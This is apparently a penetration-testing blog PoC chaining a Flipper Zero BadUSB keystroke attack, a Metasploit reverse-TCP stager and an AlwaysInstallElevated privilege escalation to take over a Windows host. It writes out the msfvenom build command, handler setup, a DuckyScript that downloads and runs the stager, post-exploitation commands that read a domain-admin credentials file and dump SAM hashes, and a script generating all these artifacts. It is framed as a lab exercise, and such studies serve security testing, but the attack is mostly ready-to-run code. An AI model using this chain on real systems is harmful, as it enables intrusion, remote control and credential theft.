{{tag>deutsch blog it-security pentest}}
====== FatCat Attack PoC ======
In this PoC we chain several weaknesses to take full control of a Windows host: physical access with a Flipper Zero acting as a BadUSB keyboard delivers a Metasploit stager, and a local privilege escalation (AlwaysInstallElevated) turns the resulting user-level session into SYSTEM.

<code>
 _____     _    ____      _   
|  ___|_ _| |_ / ___|__ _| |_ 
| |_ / _` | __| |   / _` | __|
|  _| (_| | |_| |__| (_| | |_ 
|_|  \__,_|\__|\____\__,_|\__|
Attack PoC
</code>
\\ \\
===== Description =====
{{page>vorlagen:attention}}
The objective is to pull the relevant SAM data (local account hashes) out of the registry of the target. The Flipper is used as a BadUSB device to type the initial commands. The PowerShell execution policy is bypassed for the process, and a privilege escalation provides the rights needed to dump the hashes (''hashdump'' needs SYSTEM, which the user-level Meterpreter session obtained through the BadUSB run does not have).

The following data is to be exfiltrated:
^ User ^ Password ^ Hash ^
| Host \ User | | |
| Host \ Admin | | |
| Domain \ Admin | | |
\\ \\
===== Procedure =====
  - Disable AV on the target (lab setting; a shikata_ga_nai-encoded stager is not expected to evade a current AV)
  - Build the payload
  - Start the handler
  - BadUSB attack
  - Use the remote shell to enumerate the host
  - Search for a local exploit
  - Apply the exploit
  - Collect the credentials
\\ \\
===== Documentation =====
^ Attack Chain Step ^ Attack Technique ^ Attack Tool ^
| @#D0FA58:**Weaponization** | Exploit, Payload | msfvenom((https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom)) |
| @#FACC2E:**Delivery** | Physical access, Injection | Flipper((https://flipperzero.one/)), BadUSB((https://grantonline.medium.com/flipper-zero-badusb-getting-started-with-duckyscript-f212fcdd5dec)) |
| ::: | Bypass | PowerShell Restrictions((https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)) |
| @#2E9AFE:**Exploitation** | Reverse Shell | Metasploit((https://www.hackers-arise.com/post/2017/07/31/metasploit-basics-part-9-using-msfvenom-to-create-custom-payloads)) |
| ::: | Enumeration | **Enumerate System Info** JAWS((https://github.com/411Hall/JAWS)), SessionGopher((https://github.com/Arvanaghi/SessionGopher)), weak Service Permissions((https://fuzzysecurity.com/tutorials/16.html)), Primary Access Token Manipulation((https://www.ired.team/offensive-security/privilege-escalation/t1134-access-token-manipulation)), Unquoted Service Path((https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths)), PassTheHash((https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/README.md))((https://www.ired.team/offensive-security/privilege-escalation/pass-the-hash-privilege-escalation-with-invoke-wmiexec)), BetterSafetyKatz (builds locally, obfuscation not complete), Search for local Exploits((https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/)) |
| ::: | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) |
| @#58D3F7:**Actions on Objectives** | Exfiltration | Exfiltrate Data |
\\ \\
===== Preparation and Attack =====
==== Metasploit Payload ====
  * Start Metasploit
  * Open a command shell: <code>cmd</code>
  * Generate the payload, a staged x86 Meterpreter reverse TCP stager encoded five times with shikata_ga_nai (the option is ''--platform'' with two dashes; the LHOST and LPORT compiled in here must match the handler below): <code>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.77 LPORT=50666 -e x86/shikata_ga_nai -i 5 -f exe > msfpayload.exe</code>
  * Leave the shell: <code>exit</code>
  * Host the payload on a web server reachable from the target; the BadUSB script fetches it over HTTPS
\\
[{{:it-security:blog:002-fc-msfvenom.png?400|Generating the payload}}]
\\
==== Metasploit Handler ====
  * Start the multi/handler listener with the same payload, LHOST and LPORT that were compiled into the stager: <code>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.77
set LPORT 50666
exploit
</code>
\\
[{{:it-security:blog:001-fc-handler.png?400|Configuring and starting the Metasploit handler}}]
\\
==== Access to the Target System ====
  * The Flipper types the following DuckyScript on the target. The web server host in the ''irm'' line is left blank on this page and has to be filled in with the host from the previous step, otherwise the download fails silently and the run is wasted (the Flipper types blindly). The ''DELAY'' values have to be long enough for the Run dialog and the PowerShell console to open, or keystrokes are lost.
<code>
WINDOWS r
DELAY 2000
STRING powershell.exe
DELAY 3000
ENTER
DELAY 5000
STRING Set-ExecutionPolicy Bypass -Scope Process -force
DELAY 3000
ENTER
DELAY 3000
STRING irm https:///msfpayload.exe -OutFile msfpayload.exe
DELAY 3000
ENTER
DELAY 5000
STRING Start-Process msfpayload.exe
DELAY 3000
ENTER
DELAY 3000
STRING exit
DELAY 1500
ENTER
</code>
  * Caveat on the bypass: the execution policy only governs script files (''.ps1'' and the like). Commands typed interactively and the downloaded ''.exe'' are not subject to it, so the ''Set-ExecutionPolicy'' line is only required if the stager is delivered as a PowerShell script. It is harmless here; with ''-Scope Process'' it needs no administrator rights and leaves no persistent change on the host.
\\
[{{:it-security:blog:003-fc-flipperattack.png?400|Flipper attack being executed}}]
\\
==== Connection Established, Metasploit Takes Over ====
  * The first session runs as the logged-on user. ''getsystem'' and ''hashdump'' are tried first and fail without an elevated token, which is why a local privilege escalation is needed: <code>
getsystem
hashdump
</code>
  * A quick look around the file system shows the share with the credentials file: <code>
ls
getwd
cd c:
cd Glob_Share
ls
</code>
  * Background the session and let the local exploit suggester check which local exploits apply to it: <code>
background
use post/multi/recon/local_exploit_suggester
sessions
set SESSION 1
run
</code>
  * The suggester reports AlwaysInstallElevated. The module builds an MSI that carries the payload and lets the Windows Installer run it with elevated rights. This only works when the ''AlwaysInstallElevated'' value is set to 1 under both ''HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer'' and ''HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer''; the module checks both keys before exploiting: <code>
use exploit/windows/local/always_install_elevated
set SESSION 1
exploit
</code>
  * The new session runs as SYSTEM. Read the credentials file and dump the SAM hashes (''type'' works in a cmd shell; at the Meterpreter prompt use ''cat''): <code>
cd glob_share
type Domain-Admin-Creds.txt
hashdump
sessions -i 1
</code>
[{{:it-security:blog:004-fc-session.png?400|Meterpreter session established}}]
[{{:it-security:blog:005-fc-exploitsearch.png?400|Automated exploit search for privilege escalation}}]
[{{:it-security:blog:006-fc-privesc.png?400|Privilege escalation successful}}]
[{{:it-security:blog:007-fc-creds.png?400|The credentials we were looking for}}]
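The steps above are typed by hand in three different places (a shell for msfvenom, msfconsole for the handler and the privesc modules, and the Flipper's BadUSB script), so LHOST, LPORT and the payload URL can easily drift apart between them. As an added example, not code from the original PoC, the following POSIX shell script generates all four operator artifacts from one parameter set: the msfvenom build command, a handler resource file, the DuckyScript and a post-exploitation resource file. It refuses a URL without a host (the ''https:///msfpayload.exe'' form left on this page), and it drops the ''Set-ExecutionPolicy'' line because an .exe is not governed by the execution policy. LHOST and LPORT default to the page's values; the ''PAYLOAD_URL'', ''OUTDIR'' and ''SESSION_ID'' variables, the file names and the example host ''10.0.0.5'' are assumptions of this example.

```shell
#!/bin/sh
# Added example (not the page's own code): generate the operator-side artifacts of the
# FatCat chain from one parameter set. LHOST/LPORT default to the page's values;
# PAYLOAD_URL, OUTDIR, SESSION_ID and the file names are assumptions of this example.
set -eu

LHOST="${LHOST:-192.168.2.77}"
LPORT="${LPORT:-50666}"
PAYLOAD_NAME="msfpayload.exe"
SESSION_ID="${SESSION_ID:-1}"

# Reject a URL without a host: "https:///msfpayload.exe" makes irm fail on the target,
# and because the Flipper types blindly the whole BadUSB run is lost.
check_url() {
  case "$1" in
    http://[!/]*/*|https://[!/]*/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Step 1: msfvenom build command (note the two-dash --platform; LHOST/LPORT are compiled in).
build_cmd() {
  printf 'msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 5 -f exe -o %s\n' \
    "$LHOST" "$LPORT" "$PAYLOAD_NAME"
}

# Step 2: handler resource file for "msfconsole -r handler.rc". ExitOnSession false plus
# "exploit -j -z" keeps the listener alive and backgrounds every new session.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
}

# Step 3: Flipper DuckyScript. One PowerShell line downloads to %TEMP%, starts the stager
# and closes the console; no Set-ExecutionPolicy, since an .exe is not subject to the policy.
ducky_script() {
  url="$1"
  check_url "$url" || { echo "refusing URL without host: $url" >&2; return 1; }
  cat <<EOF
REM generated: fetch $PAYLOAD_NAME from $url and start it
DELAY 1000
WINDOWS r
DELAY 2000
STRING powershell.exe
ENTER
DELAY 5000
STRING irm $url -OutFile "\$env:TEMP\\$PAYLOAD_NAME"; Start-Process "\$env:TEMP\\$PAYLOAD_NAME"; exit
ENTER
EOF
}

# Step 4: post-exploitation resource file, loaded in the running console with
# "resource privesc.rc": suggester first, then AlwaysInstallElevated on the same session.
privesc_rc() {
  cat <<EOF
use post/multi/recon/local_exploit_suggester
set SESSION $SESSION_ID
run
use exploit/windows/local/always_install_elevated
set SESSION $SESSION_ID
exploit
EOF
}

# Write all four artifacts into the given directory.
generate_all() {
  outdir="$1"; url="$2"
  mkdir -p "$outdir"
  build_cmd > "$outdir/build_payload.sh"
  handler_rc > "$outdir/handler.rc"
  ducky_script "$url" > "$outdir/badusb.txt"
  privesc_rc > "$outdir/privesc.rc"
}

# Only generate when the operator supplied a URL, e.g.
#   PAYLOAD_URL=https://10.0.0.5/msfpayload.exe OUTDIR=./fatcat-out sh fatcat-gen.sh
if [ -n "${PAYLOAD_URL:-}" ]; then
  generate_all "${OUTDIR:-./fatcat-out}" "$PAYLOAD_URL"
fi
```

Run ''build_payload.sh'' on the attack box, start the listener with ''msfconsole -r handler.rc'', copy ''badusb.txt'' to the Flipper's BadUSB folder, and after the first session calls back load ''privesc.rc'' with ''resource'' from the msfconsole prompt. Setting ''SESSION_ID'' is only needed if the callback did not become session 1.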